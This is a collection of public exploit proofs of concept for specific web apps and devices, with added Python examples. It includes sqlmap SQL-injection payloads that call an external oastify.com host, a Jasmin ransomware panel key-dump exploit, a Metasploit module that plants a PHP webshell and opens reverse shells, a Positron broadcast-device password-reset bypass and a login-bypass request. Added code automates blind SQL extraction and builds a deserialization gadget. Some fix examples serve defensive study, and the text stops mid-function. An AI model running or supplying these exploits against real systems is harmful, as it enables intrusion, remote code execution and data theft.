<pre><code>## Title: hrm2024.1.0-Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 04/02/2024<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The cityedit parameter is vulnerable to SQL injection. The payload<br />'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'<br />was submitted in the cityedit parameter. It injects a SQL sub-query that calls MySQL's load_file function with a UNC path naming an external domain; a MySQL server on Windows resolves that host name when it tries to open the share. The application interacted with that domain, which confirms that the injected query was executed even though nothing is returned in the response (an out-of-band check that does not depend on error messages or timing).<br />The same injection point also supports boolean-based, error-based and time-based blind extraction (sqlmap output below), so an attacker can read the database contents through it.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: cityedit (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: cityedit=22'+(select<br />load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''<br />RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(select<br />load_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+''<br />ELSE 0x28 END)) AND 'GMzs'='GMzs<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: cityedit=22'+(select<br />load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''<br />OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT<br />(ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 
'qJHK'='qJHK<br /><br /> Type: time-based blind<br /> Title: MySQL > 5.0.12 AND time-based blind (heavy query)<br /> Payload: cityedit=22'+(select<br />load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''<br />AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,<br />INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR<br />1) AND 'Jtnd'='Jtnd<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/hrm-2024.1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/04/hrm202410-multiple-sqli.html)<br /><br />## Time spent:<br />01:15:00<br /><br /><br /></code></pre>
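The sqlmap output above lists three blind techniques against cityedit but does not show how data actually comes out of a boolean oracle. The following is an added example, not part of the advisory or the HRM code: it reproduces the vulnerable concatenation against a constructed in-memory sqlite stand-in (the real target is MySQL; sqlite has no RLIKE or 0x literals, so the condition is appended with a plain AND instead of sqlmap's RLIKE/CASE wrapper) and recovers a secret one character at a time by binary search. Table and column names, the row id 22 and the secret are assumptions.

```python
import sqlite3

# Constructed stand-in for the HRM backend: an in-memory sqlite database
# with one row the page renders (id 22) and a secret worth extracting.
# Table/column names and the secret are assumptions for the example.
SECRET = "s3cr3t!"


def _make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cities(id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO cities VALUES (22, 'Manila')")
    db.execute("CREATE TABLE users(username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))
    return db


DB = _make_db()
QUERIES = 0


def vulnerable_lookup(cityedit):
    """The vulnerable handler: cityedit is concatenated straight into SQL.
    True means the city page rendered (a row came back), False means it
    did not; that is the only signal a boolean-blind attacker gets."""
    global QUERIES
    QUERIES += 1
    sql = "SELECT name FROM cities WHERE id = '%s'" % cityedit
    try:
        return DB.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def ask(position, threshold):
    """One oracle question: is byte #position of the secret > threshold?
    sqlmap wraps the condition in RLIKE (CASE ... END); here it is a plain
    AND, which is the same technique in sqlite syntax."""
    payload = (
        "22' AND (SELECT unicode(substr(password,%d,1)) FROM users "
        "WHERE username='admin') > %d AND '1'='1" % (position, threshold)
    )
    return vulnerable_lookup(payload)


def extract_char(position):
    """Binary-search the ASCII range: exactly 7 questions per character."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(position, mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(max_len=64):
    """Pull the secret out through the oracle. substr() past the end is '',
    unicode('') is NULL, so every comparison fails and the search lands on
    0: that is the terminator. Returns (secret, number of requests)."""
    global QUERIES
    QUERIES = 0
    out = ""
    for position in range(1, max_len + 1):
        code = extract_char(position)
        if code == 0:
            break
        out += chr(code)
    return out, QUERIES


if __name__ == "__main__":
    secret, n = extract()
    print("recovered %r in %d requests" % (secret, n))
```

The request count is the detection angle: seven near-identical requests per recovered byte, differing only in a numeric threshold, is the signature a WAF or access-log review should key on.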
<pre><code># Exploit Title: Jasmin Ransomware arbitrary file read<br /># Date: 2024-04-04<br /># Exploit Author: @_chebuya<br /># Software Link: https://github.com/codesiddhant/Jasmin-Ransomware<br /># Version: v1.1<br /># Tested on: Ubuntu 20.04 LTS<br /># CVE: CVE-2024-30851<br /># Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login<br /># Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/main<br />import requests<br />import argparse<br />import os<br />from bs4 import BeautifulSoup<br /><br />def get_file(jasmin_url, filepath):<br /> response = requests.get(<br /> f'{jasmin_url}/download_file.php?file={filepath}',<br /> allow_redirects=False<br /> )<br /><br /> return response.text<br /><br /><br />def get_keys(jasmin_url):<br /> headers = {<br /> 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',<br /> }<br /><br /> data = "username=&password='+or+1%3D1+--+-&service=login"<br /> login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)<br /> cookies = login_req.cookies<br /><br /> list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)<br /> soup = BeautifulSoup(list_req.text, 'html.parser')<br /><br /> rows = soup.find_all('tr')<br /><br /> print(f"Dumping decryption keys from {len(rows)-1} victims")<br /> for row in rows:<br /> data = row.find_all('td')<br /> if len(data) == 0:<br /> continue<br /> <br /> username = data[1].get_text()<br /> hostname = data[0].get_text()<br /> filepath = data[7].find('a')['href'].split("=")[1]<br /><br /> print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")<br /><br /><br />parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")<br />subparser = parser.add_subparsers(dest='subcommand')<br /><br />file_parser 
= subparser.add_parser("getfile", help="Read a file off the server")<br />file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")<br />file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!<br /><br />keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")<br />keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")<br /><br />args = parser.parse_args()<br /><br />if args.subcommand != None:<br /> target_url = args.url.rstrip("/")<br /><br />if args.subcommand == "getkeys":<br /> get_keys(target_url)<br />elif args.subcommand == "getfile":<br /> target_file = args.file.replace("\\", "/").replace("c:", "")<br /> target_path = os.path.join("../../../../../../../../../", target_file)<br /> print(get_file(target_url, target_path))<br />else:<br /> parser.print_help()<br /></code></pre>
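download_file.php?file= prefixes a base directory and trusts the rest, which is why the PoC can strip the drive letter and climb with nine ../ to wherever it wants (the default target being the web server's access log, to deanonymise the operators). As an added example, not from the PoC or the panel, here is the naive join beside the containment check that would have stopped it; the directory layout and file contents are constructed for the demo.

```python
import os
import shutil
import tempfile


def naive_download_path(base_dir, user_file):
    """What a download handler that only prefixes a directory ends up with:
    '../' sequences and absolute paths both leave base_dir."""
    return os.path.normpath(os.path.join(base_dir, user_file))


def safe_download_path(base_dir, user_file):
    """Resolve user_file under base_dir and refuse anything that is not
    inside it once '..' and symlinks are resolved."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_file))
    # commonpath() is the containment test; a plain startswith() check
    # would accept /srv/keys_evil when the base is /srv/keys.
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes %r: %r" % (base, user_file))
    if not os.path.isfile(target):
        raise FileNotFoundError(user_file)
    return target


def demo():
    """Constructed layout: <tmp>/panel/keys holds the victim keys, the
    web-server log lives outside the panel directory."""
    root = tempfile.mkdtemp()
    keys = os.path.join(root, "panel", "keys")
    logs = os.path.join(root, "apache", "logs")
    os.makedirs(keys)
    os.makedirs(logs)
    with open(os.path.join(keys, "victim1.key"), "w") as f:
        f.write("AES-KEY-0001")
    with open(os.path.join(logs, "access.log"), "w") as f:
        f.write('203.0.113.7 - - "GET /dashboard.php"')
    # a symlink inside the keys dir pointing outside it (an admin "shortcut")
    os.symlink(logs, os.path.join(keys, "shortcut"))

    results = {}
    traversal = "../../apache/logs/access.log"
    # the naive join happily resolves to the log file
    with open(naive_download_path(keys, traversal)) as f:
        results["naive_reads_log"] = f.read().startswith("203.0.113.7")
    results["legit"] = safe_download_path(keys, "victim1.key").endswith("victim1.key")
    for bad in (traversal, "/etc/passwd", "shortcut/access.log"):
        try:
            safe_download_path(keys, bad)
            results[bad] = "allowed"
        except ValueError:
            results[bad] = "rejected"
    shutil.rmtree(root)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Resolving with realpath() before the comparison is what closes the symlink case; normalising the string alone would let "shortcut/access.log" through.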
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability',<br /> 'Description' => %q{<br /> A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower<br /> allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a<br /> POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.<br /> As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,<br /> potentially resulting in complete system compromise, data exfiltration, or unauthorized access<br /> to sensitive information.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br /> 'Ali Maharramli', # SecondX.io Research Team - discovery of the vulnerability<br /> 'Fikrat Guliev', # SecondX.io Research Team - discovery of the vulnerability<br /> 'Islam Rzayev' # SecondX.io Research Team - discovery of the vulnerability<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-24725'],<br /> ['URL', 'https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725'],<br /> ['PACKETSTORM', '177635'],<br /> ['EDB', '51903']<br /> ],<br /> 'DisclosureDate' => '2024-03-18',<br /> 'Platform' => ['php', 'unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 
'Platform' => ['php'],<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_X64, ARCH_X86],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],<br /> 'Linemax' => 16384,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :windows_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X64, ARCH_X86],<br /> 'Type' => :windows_dropper,<br /> 'Linemax' => 16384,<br /> 'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),<br /> OptString.new('WEBSHELL', [false, 'Set webshell name without extension. 
Name will be randomly generated if left unset.', nil]),<br /> OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address']),<br /> OptString.new('PASSWORD', [true, 'Password'])<br /> ])<br /> end<br /><br /> def gibbon_login<br /> # construct multipart login form data<br /> form_data = Rex::MIME::Message.new<br /> form_data.add_part('', nil, nil, 'form-data; name="address"')<br /> form_data.add_part('default', nil, nil, 'form-data; name="method"')<br /> form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"')<br /> form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"')<br /> form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"')<br /> form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"')<br /><br /> return send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'),<br /> 'keep_cookies' => true,<br /> 'ctype' => "multipart/form-data; boundary=#{form_data.bound}",<br /> 'data' => form_data.to_s<br /> })<br /> end<br /><br /> def construct_form_data(payload)<br /> # construct multipart form data with payload<br /> payload_len = payload.length<br /> payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}"<br /><br /> form_data = Rex::MIME::Message.new<br /> form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"')<br /> form_data.add_part('sync', nil, nil, 'form-data; name="mode"')<br /> form_data.add_part('N', nil, nil, 'form-data; 
name="syncField"')<br /> form_data.add_part('', nil, nil, 'form-data; name="syncColumn"')<br /> form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"')<br /> form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')<br /> form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')<br /> form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')<br /> form_data.add_part("#{Rex::Text.rand_text_alpha(8..16)}.xlsx", nil, nil, 'form-data; name="filename"')<br /> form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')<br /> form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')<br /> form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')<br /> return form_data<br /> end<br /><br /> def upload_webshell(b64_payload)<br /> # randomize file name if option WEBSHELL is not set<br /> @webshell_name = (datastore['WEBSHELL'].blank? ? 
"#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")<br /><br /> # create webshell with base64 encoded PHP payload<br /> # works for both windows and linux targets<br /> php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"<br /> form_data = construct_form_data(php_payload)<br /><br /> # upload webshell<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),<br /> 'keep_cookies' => true,<br /> 'ctype' => "multipart/form-data; boundary=#{form_data.bound}",<br /> 'data' => form_data.to_s<br /> })<br /> end<br /><br /> def execute_php(cmd, _opts = {})<br /> payload = Base64.strict_encode64(cmd)<br /> res = upload_webshell(payload)<br /> fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200<br /> register_file_for_cleanup(@webshell_name)<br /><br /> # execute webshell<br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, @webshell_name),<br /> 'keep_cookies' => true<br /> })<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> form_data = construct_form_data(cmd)<br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),<br /> 'keep_cookies' => true,<br /> 'ctype' => "multipart/form-data; boundary=#{form_data.bound}",<br /> 'data' => form_data.to_s<br /> })<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> res = send_request_cgi!({<br /> 'method' => 'GET',<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /> return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200<br /><br /> # check if target is running the Gibbon online 
school platform<br /> # search for the Gibbon version on the login page<br /> return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')<br /><br /> # trying to get the version<br /> version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/)<br /> version_number = version[0].split('v') unless version.nil?<br /> if version_number<br /> if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00')<br /> return CheckCode::Appears("Gibbon v#{version_number[1]}")<br /> else<br /> return CheckCode::Safe("Gibbon v#{version_number[1]}")<br /> end<br /> end<br /> CheckCode::Detected<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> res = gibbon_login<br /> fail_with(Failure::NoAccess, "Login failed with user #{datastore['USERNAME']} and password #{datastore['PASSWORD']}.") unless res && res.code == 302<br /><br /> case target['Type']<br /> when :php<br /> execute_php(payload.encoded)<br /> when :unix_cmd, :windows_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper, :windows_dropper<br /> # don't check the response here since the server won't respond<br /> # if the payload is successfully executed.<br /> execute_cmdstager({ linemax: target.opts['Linemax'] })<br /> end<br /> end<br />end<br /></code></pre>
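The module builds the Monolog SyslogUdpHandler to BufferHandler gadget by string interpolation, using Ruby's payload.length for the s:N: length. PHP counts bytes in s:N:, Ruby's String#length counts characters, so a command containing multibyte characters would produce a blob that unserialize() rejects (Metasploit payloads are normally ASCII, which is why this rarely bites). The following is an added example, not the module's code: the same gadget assembled from byte lengths, plus a small walker over PHP's serialization format that checks every length before the blob is sent. The command strings are illustrative.

```python
def php_str(raw):
    """Serialize one PHP string: s:<byte length>:"<bytes>";
    PHP counts bytes, so encode first and never use a character count."""
    return b's:%d:"%s";' % (len(raw), raw)


def _protected(name):
    """Protected properties are serialized as "\\0*\\0<name>"."""
    return php_str(b"\x00*\x00" + name)


def monolog_gadget(command):
    """The SyslogUdpHandler -> BufferHandler chain the module interpolates.
    On destruction the buffered record is passed through the 'processors'
    list: current() yields the command string, system() runs it."""
    cmd = command.encode("utf-8")
    return (
        b'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{'
        + _protected(b"socket")
        + b'O:29:"Monolog\\Handler\\BufferHandler":7:{'
        + _protected(b"handler") + b"r:3;"
        + _protected(b"bufferSize") + b"i:-1;"
        + _protected(b"buffer") + b"a:1:{i:0;a:2:{i:0;" + php_str(cmd)
        + php_str(b"level") + b"N;}}"
        + _protected(b"level") + b"N;"
        + _protected(b"initialized") + b"b:1;"
        + _protected(b"bufferLimit") + b"i:-1;"
        + _protected(b"processors") + b"a:2:{i:0;" + php_str(b"current")
        + b"i:1;" + php_str(b"system") + b"}"
        + b"}}i:7;i:7;}"
    )


def _walk(b, pos):
    """Parse one serialized value at pos and return the index just after it.
    Raises ValueError on any structural or length mismatch."""
    t = b[pos:pos + 1]
    if t in (b"i", b"b", b"d", b"r", b"R"):
        return b.index(b";", pos) + 1
    if t == b"N":
        if b[pos:pos + 2] != b"N;":
            raise ValueError("bad null at %d" % pos)
        return pos + 2
    if t == b"s":
        colon = b.index(b":", pos + 2)
        n = int(b[pos + 2:colon])
        start = colon + 2                      # skip :"
        if b[start + n:start + n + 2] != b'";':
            raise ValueError("string length %d wrong at %d" % (n, pos))
        return start + n + 2
    if t == b"a":
        colon = b.index(b":", pos + 2)
        count = int(b[pos + 2:colon])
        p = colon + 2                          # skip :{
        for _ in range(2 * count):             # key, value pairs
            p = _walk(b, p)
        if b[p:p + 1] != b"}":
            raise ValueError("array not closed at %d" % p)
        return p + 1
    if t == b"O":
        colon = b.index(b":", pos + 2)
        name_len = int(b[pos + 2:colon])
        p = colon + 2 + name_len + 2           # skip :"<class name>":
        colon = b.index(b":", p)
        count = int(b[p:colon])
        p = colon + 2                          # skip :{
        for _ in range(2 * count):
            p = _walk(b, p)
        if b[p:p + 1] != b"}":
            raise ValueError("object not closed at %d" % p)
        return p + 1
    raise ValueError("unknown type %r at %d" % (t, pos))


def is_well_formed(b):
    """True when the blob parses completely with every s:N: length exact."""
    try:
        return _walk(b, 0) == len(b)
    except (ValueError, IndexError):
        return False
```

Run is_well_formed() on the blob before the POST: a length that is off by one makes unserialize() return false and the request looks like a dud rather than a bad payload.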
<pre><code>#!/usr/bin/env python<br /># -*- coding: utf-8 -*-<br />#<br />#<br /># Positron Broadcast Signal Processor TRA7005 v1.20 _Passwd Exploit<br />#<br />#<br /># Vendor: Positron srl<br /># Product web page: https://www.positron.it<br /># https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/<br /># Affected version: 1.20<br /># TRA7K5_REV107<br /># TRA7K5_REV106<br /># TRA7K5_REV104<br /># TRA7K5_REV102<br />#<br /># Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to<br /># guarantee an excellent quality-price ratio in compliance with current regulations and<br /># intended for individual broadcasters or radio networks. All models in the TRA7000 series<br /># are fully digital, using only high-quality components such as 24-bit A/D and D/A converters<br /># and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output<br /># MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper<br /># for both analogue and digital audio inputs, change-over emergency switching between any<br /># input with adjustable thresholds and intervention times, both in the switching phase on<br /># the secondary source and in the return phase to the primary source. Ethernet connection<br /># with Web-Server (optional) for total control and management of the device. Advanced BYPASS<br /># system between MPX input and outputs, active on operating and power supply anomalies and<br /># can also be activated remotely.<br />#<br /># Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication<br /># bypass through a direct and unauthorized access to the password management functionality.<br /># The vulnerability allows attackers to bypass Digest authentication by manipulating the<br /># password endpoint _Passwd.html and its payload data to set a user's password to arbitrary<br /># value or remove it entirely. 
This grants unauthorized access to protected areas (/user,<br /># /operator, /admin) of the application without requiring valid credentials, compromising<br /># the device's system security.<br />#<br /># Tested on: Positron Web Server<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2024-5813<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php<br />#<br />#<br /># 22.03.2024<br />#<br />#<br /><br /><br />import requests,sys<br /><br />print("""<br />______________________________________<br />┏┳┓• ┏┓ ┓ ┏┓ ┓ • <br /> ┃ ┓┏┓┓┏ ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫ ┣ ┓┏┏┓┃┏┓┓╋<br /> ┻ ┗┛┗┗┫ ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻ ┗┛┛┗┣┛┗┗┛┗┗<br /> ┛ ┛<br /> for<br /> Positron Digital Signal Processor<br /> ZSL-2024-5813<br />______________________________________<br />""")<br /><br />if len(sys.argv) != 4:<br /> print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>")<br /> sys.exit(1)<br /><br />ip = sys.argv[1]<br />ut = sys.argv[2]<br />wa = sys.argv[3]<br /><br />valid_ut = ['user', 'oper', 'admin']<br />if ut.lower() not in valid_ut:<br /> print("Invalid user type! Use 'user', 'oper', or 'admin'.")<br /> sys.exit(1)<br /><br />url = f'http://{ip}/_Passwd.html'<br />did = f'http://{ip}/_Device.html'<br /><br />try:<br /> r = requests.get(did)<br /> if r.status_code == 200 and 'TRA7K5' in r.text:<br /> print("Vulnerable processor found!")<br /> else:<br /> print("Not Vulnerable or not applicable. 
Exploit exiting.")<br /> sys.exit(1)<br />except requests.exceptions.RequestException as e:<br /> print(f"Error checking device: {e}")<br /> sys.exit(1)<br /><br />headers = {<br /> 'Content-Type' : 'application/x-www-form-urlencoded',<br /> 'Accept-Language': 'mk-MK,en;q=0.6',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'User-Agent' : 'R-Marina/11.9',<br /> 'Accept' : '*/*'<br />}<br /><br />payload = {}<br />if wa.lower() == 'erase':<br /> payload[f'PSW_{ut.capitalize()}'] = 'NONE'<br />else:<br /> payload_key = f'PSW_{ut.capitalize()}'<br /> payload[payload_key] = wa<br /> #print(payload)<br /><br />r = requests.post(url, headers=headers, data=payload)<br />print(r.status_code)<br />print(r.text)<br /></code></pre>
<pre><code># Exploit Title: User Registration & Login and User Management System v3.2 - SQL Injection (Unauthenticated)<br /># Exploit Author: Yusuf DİNÇ<br /># Google Dork: NA<br /># Date: 05/03/2024<br /># Vendor Homepage: https://phpgurukul.com<br /># Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/<br /># Version: 3.2<br /># Tested on: Linux<br /><br /># The uemail field of login.php is concatenated into the query: the single quote closes the<br /># string, OR 1=1 makes the condition true and the MySQL # comment discards the rest of the statement.<br /><br />POST /test/loginsystem/login.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 53<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/test/loginsystem/login.php<br />Cookie: csrftoken=WYNmntI3xnkUlg89ElNUCBp6mFVAZel8; sessionid=t5apbvw2jdnur3uvudxt8mcn7cdudbi5; PHPSESSID=1mnimk5b1591oukpi0kh90n0hv<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />uemail=test%40gmail.com'+OR+1=1#&password=test&login=<br /></code></pre>
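Both this request (uemail=test@gmail.com' OR 1=1#) and the Jasmin PoC's checklogin.php bypass (password=' or 1=1 -- -) are the same bug: credentials pasted into the WHERE clause. As an added example, not from either application, the vulnerable concatenation and the bound-parameter version side by side against a constructed in-memory sqlite table. MySQL accepts both # and "-- " as line comments; sqlite only the latter, so the phpgurukul payload is written with -- here. The account and password are assumptions.

```python
import sqlite3

# Constructed stand-in for the users table; MySQL in the real applications.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users(email TEXT, password TEXT)")
DB.execute("INSERT INTO users VALUES ('admin@example.com', 'Correct-Horse-Battery')")
DB.commit()


def login_vulnerable(email, password):
    """Credentials concatenated into the statement, as in login.php and
    checklogin.php. Returns the matched account or None."""
    sql = "SELECT email FROM users WHERE email='%s' AND password='%s'" % (email, password)
    row = DB.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(email, password):
    """Same query with bound parameters: the quote in the input is data,
    so the WHERE clause keeps its shape whatever the user types."""
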